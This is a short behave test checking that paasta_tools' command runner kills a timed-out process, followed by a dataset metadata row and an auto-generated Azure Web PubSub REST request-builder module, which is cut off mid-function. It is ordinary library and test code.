# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import signal
from behave import then
from behave import when
from paasta_tools.utils import _run
@when("we run a trivial command with timeout {timeout} seconds")
def run_command(context, timeout):
fake_cmd = "sleep 1"
context.rc, context.output = _run(fake_cmd, timeout=float(timeout))
@then("the command is killed with signal {killsignal}")
def check_exit_code(context, killsignal):
assert context.rc == -1 * getattr(signal, killsignal)
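# Subprocess convention: a process killed by a signal reports a negative
# return code equal to -<signum> (e.g. SIGKILL -> -9), which is what the
# assertion above checks via getattr(signal, killsignal).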
|
0d45d12eb9163aaeacd9b326c0ae3cf4a0967ace
|
c50e7eb190802d7849c0d0cea02fb4d2f0021777
|
/src/webpubsub/azext_webpubsub/vendored_sdks/azure_messaging_webpubsubservice/rest.py
|
8da673e1a390ec7f8ade5b4705500532a68c4e3f
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
Azure/azure-cli-extensions
|
c1615b19930bba7166c282918f166cd40ff6609c
|
b8c2cf97e991adf0c0a207d810316b8f4686dc29
|
refs/heads/main
| 2023-08-24T12:40:15.528432
| 2023-08-24T09:17:25
| 2023-08-24T09:17:25
| 106,580,024
| 336
| 1,226
|
MIT
| 2023-09-14T10:48:57
| 2017-10-11T16:27:31
|
Python
|
UTF-8
|
Python
| false
| false
| 38,376
|
py
|
rest.py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
__all__ = [
'build_add_connection_to_group_request',
'build_add_user_to_group_request',
'build_connection_exists_request',
'build_group_exists_request',
'build_check_permission_request',
'build_user_exists_request',
'build_close_client_connection_request',
'build_grant_permission_request',
'build_healthapi_get_health_status_request',
'build_remove_connection_from_group_request',
'build_remove_user_from_all_groups_request',
'build_remove_user_from_group_request',
'build_revoke_permission_request',
'build_send_to_all_request',
'build_send_to_connection_request',
'build_send_to_group_request',
'build_send_to_user_request'
]
from typing import TYPE_CHECKING
from msrest import Serializer
from azure.core.pipeline.transport._base import _format_url_section
from .core.rest import HttpRequest
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, IO, List, Optional, Union, Dict
from typing_extensions import Literal
Permissions = Union[Literal['joinLeaveGroup'], Literal['sendToGroup']] # pylint: disable=unsubscriptable-object
_SERIALIZER = Serializer()
def build_healthapi_get_health_status_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Get service health status.
Get service health status.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/health')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
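# Usage sketch (assuming a service client exposing `send_request`, per the
# llcwiki pattern cited in the docstrings -- not defined in this module):
#   request = build_healthapi_get_health_status_request()
#   response = client.send_request(request)  # HEAD /api/health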
def build_send_to_all_request(
hub, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Broadcast content inside request body to all the connected client connections.
Broadcast content inside request body to all the connected client connections.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword excluded: Excluded connection Ids.
:paramtype excluded: list[str]
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
excluded = kwargs.pop('excluded', None) # type: Optional[List[str]]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if excluded is not None:
query_parameters['excluded'] = [_SERIALIZER.query("excluded", q, 'str') if q is not None else '' for q in excluded]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_connection_exists_request(
hub, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if the connection with the given connectionId exists.
Check if the connection with the given connectionId exists.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: The connection Id.
:type connection_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_close_client_connection_request(
hub, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Close the client connection.
Close the client connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: Target connection Id.
:type connection_id: str
    :keyword reason: The reason for closing the client connection.
:paramtype reason: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
reason = kwargs.pop('reason', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if reason is not None:
query_parameters['reason'] = _SERIALIZER.query("reason", reason, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_connection_request(
hub, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Send content inside request body to the specific connection.
Send content inside request body to the specific connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: The connection Id.
:type connection_id: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/connections/{connectionId}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_group_exists_request(
hub, # type: str
group, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if there are any client connections inside the given group.
Check if there are any client connections inside the given group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param group: Target group name, whose length must be greater than 0 and less than 1025.
:type group: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_group_request(
hub, # type: str
group, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Send content inside request body to a group of connections.
Send content inside request body to a group of connections.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param group: Target group name, whose length should be greater than 0 and less than 1025.
:type group: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword excluded: Excluded connection Ids.
:paramtype excluded: list[str]
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
excluded = kwargs.pop('excluded', None) # type: Optional[List[str]]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if excluded is not None:
query_parameters['excluded'] = [_SERIALIZER.query("excluded", q, 'str') if q is not None else '' for q in excluded]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
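# Hedged note: each entry of `excluded` is serialized as its own repeated
# `excluded=` query parameter (see the loop above). A minimal sketch, with
# placeholder connection ids:
#
#   request = build_send_to_group_request(
#       "chat", "room1", json={"message": "hi"},
#       content_type="application/json", excluded=["conn-1", "conn-2"])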
def build_add_connection_to_group_request(
hub, # type: str
group, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Add a connection to the target group.
Add a connection to the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param group: Target group name, whose length should be greater than 0 and less than 1025.
:type group: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
**kwargs
)
def build_remove_connection_from_group_request(
hub, # type: str
group, # type: str
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Remove a connection from the target group.
Remove a connection from the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param group: Target group name, whose length should be greater than 0 and less than 1025.
:type group: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/groups/{group}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_user_exists_request(
hub, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if there are any client connections connected for the given user.
Check if there are any client connections connected for the given user.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="HEAD",
url=url,
params=query_parameters,
**kwargs
)
def build_send_to_user_request(
hub, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Send content inside request body to the specific user.
Send content inside request body to the specific user.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: The user Id.
:type user_id: str
:keyword json: The payload body.
:paramtype json: Any
:keyword content: The payload body.
:paramtype content: IO
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
Example:
.. code-block:: python
# JSON input template you can fill out and use as your `json` input.
json = "Any (optional)"
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
content_type = kwargs.pop("content_type", None)
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/:send')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_add_user_to_group_request(
hub, # type: str
group, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Add a user to the target group.
Add a user to the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param group: Target group name, whose length should be greater than 0 and less than 1025.
:type group: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/groups/{group}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
**kwargs
)
def build_remove_user_from_group_request(
hub, # type: str
group, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Remove a user from the target group.
Remove a user from the target group.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param group: Target group name, whose length should be greater than 0 and less than 1025.
:type group: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/groups/{group}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'group': _SERIALIZER.url("group", group, 'str', max_length=1024, min_length=1),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_remove_user_from_all_groups_request(
hub, # type: str
user_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Remove a user from all groups.
Remove a user from all groups.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: Target user Id.
:type user_id: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/users/{userId}/groups')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'userId': _SERIALIZER.url("user_id", user_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_grant_permission_request(
hub, # type: str
permission, # type: Permissions
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Grant permission to the connection.
Grant permission to the connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param permission: The permission: currently supported actions are joinLeaveGroup and
     sendToGroup.
:type permission: str or ~Permissions
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: Optional. If not set, grant the permission to all the targets. If set,
grant the permission to the specific target. The meaning of the target depends on the specific
permission.
:paramtype target_name: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
target_name = kwargs.pop('target_name', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'permission': _SERIALIZER.url("permission", permission, 'str'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if target_name is not None:
query_parameters['targetName'] = _SERIALIZER.query("target_name", target_name, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
**kwargs
)
def build_revoke_permission_request(
hub, # type: str
permission, # type: Permissions
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Revoke permission for the connection.
Revoke permission for the connection.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param permission: The permission: currently supported actions are joinLeaveGroup and
     sendToGroup.
:type permission: str or ~Permissions
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: Optional. If not set, revoke the permission for all targets. If set,
revoke the permission for the specific target. The meaning of the target depends on the
specific permission.
:paramtype target_name: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
target_name = kwargs.pop('target_name', None) # type: Optional[str]
api_version = kwargs.pop('api_version', "2021-05-01-preview") # type: Optional[str]
# Construct URL
url = kwargs.pop("template_url", '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}')
path_format_arguments = {
'hub': _SERIALIZER.url("hub", hub, 'str', pattern=r'^[A-Za-z][A-Za-z0-9_`,.[\]]{0,127}$'),
'permission': _SERIALIZER.url("permission", permission, 'str'),
'connectionId': _SERIALIZER.url("connection_id", connection_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if target_name is not None:
query_parameters['targetName'] = _SERIALIZER.query("target_name", target_name, 'str')
if api_version is not None:
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_check_permission_request(
hub, # type: str
permission, # type: Permissions
connection_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
"""Check if a connection has permission to the specified action.
Check if a connection has permission to the specified action.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this request builder into your code flow.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
    :param permission: The permission: currently supported actions are joinLeaveGroup and
     sendToGroup.
    :type permission: str or ~Permissions
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: Optional. If not set, get the permission for all targets. If set, get the
permission for the specific target. The meaning of the target depends on the specific
permission.
:paramtype target_name: str
:keyword api_version: Api Version.
:paramtype api_version: str
:return: Returns an :class:`~azure.messaging.webpubsubservice.core.rest.HttpRequest` that you will pass to the client's `send_request` method.
See https://aka.ms/azsdk/python/llcwiki for how to incorporate this response into your code flow.
:rtype: ~azure.messaging.webpubsubservice.core.rest.HttpRequest
"""
target_name = kwargs.pop('target_name', None) # type: Optional[str]
